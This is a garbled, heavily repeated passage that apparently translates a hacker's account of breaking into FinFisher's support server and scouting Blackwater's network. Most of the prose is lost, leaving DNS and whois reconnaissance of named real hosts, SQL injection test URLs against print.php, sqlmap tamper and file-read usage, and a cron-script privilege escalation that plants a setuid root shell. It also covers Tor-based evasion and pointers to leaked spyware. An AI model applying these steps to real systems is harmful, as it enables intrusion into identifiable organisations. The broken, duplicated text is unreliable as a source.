IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

1. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
2. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
3. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
4. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
5. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

